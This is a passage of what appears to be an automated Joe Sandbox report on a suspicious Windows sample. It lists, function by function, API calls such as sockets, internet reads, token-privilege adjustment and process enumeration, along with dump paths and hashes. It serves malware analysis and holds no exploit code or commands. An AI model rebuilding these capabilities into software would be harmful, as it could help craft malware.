                                                • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 003419FA
                                              • GetSysColor.USER32(0000000F), ref: 00341A4E
                                              • SetBkColor.GDI32(?,00000000), ref: 00341A61
                                                • Part of subcall function 00341290: DefDlgProcW.USER32(?,00000020,?), ref: 003412D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ColorProc$LongWindow
                                              • String ID:
                                              • API String ID: 3744519093-0
                                              • Opcode ID: 4123e44afd030fcf071d55c5dd540e3b131a85a96af93c4e68c44e445c5f1773
                                              • Instruction ID: 99834bb1d113bd87521a46ea06cfa30320817d8261ae96e5c56502674775ee1b
                                              • Opcode Fuzzy Hash: 4123e44afd030fcf071d55c5dd540e3b131a85a96af93c4e68c44e445c5f1773
                                              • Instruction Fuzzy Hash: DAA16971112D44BAE63BAF284C48F7F69ECDF42341F16411AF506DE592CB28BD8097B6
                                              APIs
                                                • Part of subcall function 003B7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003B7DB6
                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003B679E
                                              • WSAGetLastError.WSOCK32(00000000), ref: 003B67C7
                                              • bind.WSOCK32(00000000,?,00000010), ref: 003B6800
                                              • WSAGetLastError.WSOCK32(00000000), ref: 003B680D
                                              • closesocket.WSOCK32(00000000,00000000), ref: 003B6821
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 99427753-0
                                              • Opcode ID: 51fa0b573bda185bbf20488eae7053718c3d92373bf77ed0c4756f3000afc07a
                                              • Instruction ID: 5e1b8fab46410d5b149c213d16408d35c86d43c7a8c9c03b738be7665dc101c5
                                              • Opcode Fuzzy Hash: 51fa0b573bda185bbf20488eae7053718c3d92373bf77ed0c4756f3000afc07a
                                              • Instruction Fuzzy Hash: 7441B275A00210AFDB12BF288C87F6E77E8DB49754F048459FA1AAF3D3CA74AD008791
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: 1d09857419589813801ac6a2056b75c074ae8309de2d7468dbe28249ae304827
                                              • Instruction ID: d9c8e54513acb14a77d97c72998329e9d5d6865f54dc869fbfa0a4a23bf8ae1a
                                              • Opcode Fuzzy Hash: 1d09857419589813801ac6a2056b75c074ae8309de2d7468dbe28249ae304827
                                              • Instruction Fuzzy Hash: AE119D323009516FEB236F269C44F6ABB9DEF857A1F41402DE846DB241CBB0FC418BA4
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003980C0
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003980CA
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003980D9
                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003980E0
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003980F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: d7d15ca5b36222417ba6a43bf8b462638834c1046e458072353cafc882181cb3
                                              • Instruction ID: 9a0ea64316a5eecc29eb6d71c08c63f9562b6483a49f3e5bfe7a2730969f0a23
                                              • Opcode Fuzzy Hash: d7d15ca5b36222417ba6a43bf8b462638834c1046e458072353cafc882181cb3
                                              • Instruction Fuzzy Hash: BCF04F35240214AFEB120FA6EC8DE673BADFF8A755F040029F945D6150CA61AC41DB60
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00344AD0), ref: 00344B45
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00344B57
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                              • API String ID: 2574300362-192647395
                                              • Opcode ID: 6dfdf27229594947d2f66b2f87cc7798faf2c81e2954a06524ef53cbbf3c3c61
                                              • Instruction ID: 583d505e3d7a543390b1f12b9c8322af0a65bb62758155b0255515b24d0155b6
                                              • Opcode Fuzzy Hash: 6dfdf27229594947d2f66b2f87cc7798faf2c81e2954a06524ef53cbbf3c3c61
                                              • Instruction Fuzzy Hash: 3AD0EC74A10712CFDB229B31D818F4676D9AF05351B15883DD486D6160D770E880C755
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 003BEE3D
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 003BEE4B
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                              • Process32NextW.KERNEL32(00000000,?), ref: 003BEF0B
                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 003BEF1A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                              • String ID:
                                              • API String ID: 2576544623-0
                                              • Opcode ID: 0dc41aee43acec5ae1ab278b924bbbb6a20b9d2200c8af5c01315ea902163a2a
                                              • Instruction ID: e0d9cda8edfa72ccdc341621971c3f01904e52ccf831e88a6a73e30ab07ace28
                                              • Opcode Fuzzy Hash: 0dc41aee43acec5ae1ab278b924bbbb6a20b9d2200c8af5c01315ea902163a2a
                                              • Instruction Fuzzy Hash: DB516E71504311AFD322EF24CC85EABB7E8EF94714F10482DF5959A2A2EB70E904CB92
                                              APIs
                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0039E628
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: ($|
                                              • API String ID: 1659193697-1631851259
                                              • Opcode ID: 5e92eafcdaf3427713f146abefb16abbb63c05446da4f5a9066e72235f17f47e
                                              • Instruction ID: 48a8c3d03459a13af4b1324e2e581aebc9817e1016b86322546e2142bf6c06a4
                                              • Opcode Fuzzy Hash: 5e92eafcdaf3427713f146abefb16abbb63c05446da4f5a9066e72235f17f47e
                                              • Instruction Fuzzy Hash: 9D323575A007059FDB29CF59C48196AB7F0FF48320B16C56EE89ADB7A1EB70E941CB40
                                              APIs
                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003B180A,00000000), ref: 003B23E1
                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003B2418
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Internet$AvailableDataFileQueryRead
                                              • String ID:
                                              • API String ID: 599397726-0
                                              • Opcode ID: 58384b2f5d4bd974f82cc8905fd9e73b48eccc7cd3b75b933245c7814fdaa794
                                              • Instruction ID: 340effd3e2195669e26a47a13efb15d172eb3d8c1b4dfc7017b67b19466dc8de
                                              • Opcode Fuzzy Hash: 58384b2f5d4bd974f82cc8905fd9e73b48eccc7cd3b75b933245c7814fdaa794
                                              • Instruction Fuzzy Hash: 74410375A00209BFEB129F96DC81EFFB7FCEB40318F10412AFB05A6940DA75AE419660
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 003AB343
                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003AB39D
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003AB3EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DiskFreeSpace
                                              • String ID:
                                              • API String ID: 1682464887-0
                                              • Opcode ID: a8e4ac7a48814c3b48885f075d1b3a2e5723744257d156e8c8165b010ad281de
                                              • Instruction ID: 4f4cf10a1668df735ce2aa66d2c2b5ed09551e36809f52fbb1c1f88c3378b771
                                              • Opcode Fuzzy Hash: a8e4ac7a48814c3b48885f075d1b3a2e5723744257d156e8c8165b010ad281de
                                              • Instruction Fuzzy Hash: F2214A35A00108EFCB01EFA5D885AAEBBF8FF49310F1480AAE905AB251CB31A915CB50
                                              APIs
                                                • Part of subcall function 00360DB6: std::exception::exception.LIBCMT ref: 00360DEC
                                                • Part of subcall function 00360DB6: __CxxThrowException@8.LIBCMT ref: 00360E01
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039882B
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00398858
                                              • GetLastError.KERNEL32 ref: 00398865
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                              • String ID:
                                              • API String ID: 1922334811-0
                                              • Opcode ID: 89b2ce01c783ea662aca3b82cafb28b86ade3fc275b2d941c740aa6dd5f66eea
                                              • Instruction ID: b6253fb34156ff0c18bbc780e7d8689c50d7887a44df6744afb8c37c2cc347a7
                                              • Opcode Fuzzy Hash: 89b2ce01c783ea662aca3b82cafb28b86ade3fc275b2d941c740aa6dd5f66eea
                                              • Instruction Fuzzy Hash: 73118CB2914204AFEB19DFA4DC86D6BBBFDFB45710B20852EF45697241EB30BC408B60
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00398774
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0039878B
                                              • FreeSid.ADVAPI32(?), ref: 0039879B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: 5d1b9ff6b09f8cea617652660a49daa9f8382c34d27752835a41ea7a53d8b296
                                              • Instruction ID: 7bb7792eb57a3071366bfb6d80b8ce9481546e8e87c444381a243db257db4195
                                              • Opcode Fuzzy Hash: 5d1b9ff6b09f8cea617652660a49daa9f8382c34d27752835a41ea7a53d8b296
                                              • Instruction Fuzzy Hash: BCF03775A11208BFDF00DFE49C89EBEBBBDEF08701F1044A9A901E2181E6716A048B50
                                              APIs
                                              • __time64.LIBCMT ref: 003A889B
                                                • Part of subcall function 0036520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003A8F6E,00000000,?,?,?,?,003A911F,00000000,?), ref: 00365213
                                                • Part of subcall function 0036520A: __aulldiv.LIBCMT ref: 00365233
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Time$FileSystem__aulldiv__time64
                                              • String ID: 0e@
                                              • API String ID: 2893107130-3044860656
                                              • Opcode ID: 7d057725d77fc37a8757de344a27fa1aa65f35205f7e216064d8e5f3b0293379
                                              • Instruction ID: f70d9ea28d30d17f97a80810b282382ab59756bfa5b6cd6144bf6d9e409c79a9
                                              • Opcode Fuzzy Hash: 7d057725d77fc37a8757de344a27fa1aa65f35205f7e216064d8e5f3b0293379
                                              • Instruction Fuzzy Hash: 1121AF326256108BC72ACF29D841A52B7E5EBA5311B698E6CD0F6CF2C0CE34A905CB94
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 003AC6FB
                                              • FindClose.KERNEL32(00000000), ref: 003AC72B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 0ba1bb2c969c7dfcf2ba0e2404e9a5d78059d2fe7d83226a6e75d13cafecba8c
                                              • Instruction ID: 42b89b097316f5538b354cb3d8b9a137904ec3fe6c02b6ed1aa24553936cd8bc
                                              • Opcode Fuzzy Hash: 0ba1bb2c969c7dfcf2ba0e2404e9a5d78059d2fe7d83226a6e75d13cafecba8c
                                              • Instruction Fuzzy Hash: 13115E766106049FDB11DF29D845A2AF7E9EF85324F01851EF9AADB291DB30B805CB81
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003B9468,?,003CFB84,?), ref: 003AA097
                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003B9468,?,003CFB84,?), ref: 003AA0A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: a40b32980b09dca819941e9230022f64f80accb988017cd8cc9506319175128f
                                              • Instruction ID: a8c631cd6317b46f900ec334f69b71b5558781ba4549c91cced70d0bc39358fe
                                              • Opcode Fuzzy Hash: a40b32980b09dca819941e9230022f64f80accb988017cd8cc9506319175128f
                                              • Instruction Fuzzy Hash: EEF0823651522DBBDB629FA4CC48FEA776DFF09361F008165F909D6181D730A944CBA1
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00398309), ref: 003981E0
                                              • CloseHandle.KERNEL32(?,?,00398309), ref: 003981F2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: 48d24f682b7f8a80025616b51800e70f2d25b5a9034813f14dce7f8e9c395702
                                              • Instruction ID: ffc842f8062377361415e973faf860366a6a90fb3d44e1eff63b95ec1e193ddc
                                              • Opcode Fuzzy Hash: 48d24f682b7f8a80025616b51800e70f2d25b5a9034813f14dce7f8e9c395702
                                              • Instruction Fuzzy Hash: EBE0B672010A20AEEB272B60EC09D777BAEEF44310B148829B8A6C4475DB62AC91DB14
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00368D57,?,?,?,00000001), ref: 0036A15A
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0036A163
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 80066a17d61224719bcfd67e7de031ed731fc0b2a70e43f52ccc3a4479637432
                                              • Instruction ID: 9662621202b121151370905b5c84057a9e8589d17773eeed5b99fff3742932b4
                                              • Opcode Fuzzy Hash: 80066a17d61224719bcfd67e7de031ed731fc0b2a70e43f52ccc3a4479637432
                                              • Instruction Fuzzy Hash: 47B09235054248BFCA022B91EC09F883F6EEB84BA2F404020FA0DC4060CB6266508B91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7a81d0d585199ab859bd360904c7c3add7fa6e340ca80e9e1806c6e1aba9732d
                                              • Instruction ID: b293a8bced93cd39bcede41ba292ba0a6ebf58d1c918d5af701560acced2801b
                                              • Opcode Fuzzy Hash: 7a81d0d585199ab859bd360904c7c3add7fa6e340ca80e9e1806c6e1aba9732d
                                              • Instruction Fuzzy Hash: 6832F426D2AF414DD7239634E832335A38DAFB73D5F55D737E81AB5AA9EB28C4834100
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a6c46a8d3d2d29eef4a73a0f2e8b1af26d2654e412811a61722057259f76e6b
                                              • Instruction ID: 2a729c34657995584f8fce06ebaf5143415579a231e174854d7f9fd1b56be413
                                              • Opcode Fuzzy Hash: 4a6c46a8d3d2d29eef4a73a0f2e8b1af26d2654e412811a61722057259f76e6b
                                              • Instruction Fuzzy Hash: 42B1F120E2AF414DD72396399931336BB5CAFBB2D5F52D71BFC2A74E22EB2185834141
                                              APIs
                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003A4C4A
                                              Memory Dump Source
